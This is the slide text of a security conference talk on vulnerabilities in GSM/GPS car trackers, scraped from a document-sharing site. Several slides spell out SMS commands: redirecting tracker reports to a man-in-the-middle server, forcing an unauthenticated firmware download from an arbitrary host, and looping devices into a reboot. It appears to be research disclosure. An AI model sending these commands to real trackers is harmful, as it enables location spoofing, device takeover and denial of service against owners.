Chastukhin, cherbov where is my car dude
-
Upload
defconrussia -
Category
Documents
-
view
1.005 -
download
0
Transcript of Chastukhin, cherbov where is my car dude
![Page 1: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/1.jpg)
Where is my car, dude?!
Dmitry Chastuhin
Gleb Cherbov
![Page 2: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/2.jpg)
About
Dmitry chipik Chastuhin
Yet another security researcher
@_chipik
![Page 3: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/3.jpg)
About
Gleb Cherbov
• Digital security • Defcon Russia 7812
@cherboff
![Page 4: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/4.jpg)
![Page 5: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/5.jpg)
![Page 6: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/6.jpg)
So what?
GSM channel GPS Server side Device
Fake BTS
Jammers
?
![Page 7: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/7.jpg)
Tracker
![Page 8: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/8.jpg)
Attack. Inf disclosure
![Page 9: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/9.jpg)
Attack. XSS
![Page 10: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/10.jpg)
Attack. SQLinj
![Page 11: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/11.jpg)
PROFIT?
All your cars
prisoners
children
are belong to us…
![Page 12: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/12.jpg)
Too simple…
![Page 13: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/13.jpg)
So what?
GSM channel GPS Server side Device
Fake BTS
Jammers
OWASP top 9000
?
![Page 14: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/14.jpg)
GSM/GPRS
GPS
Power/peripheral RS-232
Mic/speaker
SIM ARM
GPS ant.
![Page 15: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/15.jpg)
How to interact with? RS-232 – configuration,
firmware update
SMS – configuration,
data exchange
GPRS – data exchange,
configuration, firmware update
Voice call – just for voice calling =)
![Page 16: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/16.jpg)
SMS configuration require authentication…
…but who use it?
![Page 17: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/17.jpg)
…In numbers
43
22 11
secure no password "123" like login/pass
![Page 18: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/18.jpg)
MiTM
setparam 3245 <IP> setparam 3246 <Port>
change any sent parameter: • coordinates • speed • fuel level
![Page 19: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/19.jpg)
DEMO
![Page 20: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/20.jpg)
Firmware update through SMS
• Just sent SMS: BOOT <IMEI> <APN setting> <ip:port> <filename>
…and device try to load ip:port\filename and update own firmware
Without any authentication!
![Page 21: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/21.jpg)
DoS through SMS
• Just sent SMS: BOOT <IMEI>
…and device will be reboot in infinity updater loop
![Page 22: Chastukhin, cherbov where is my car dude](https://reader033.fdocuments.us/reader033/viewer/2022052619/55658ae5d8b42a2b6d8b4c2b/html5/thumbnails/22.jpg)
Questions?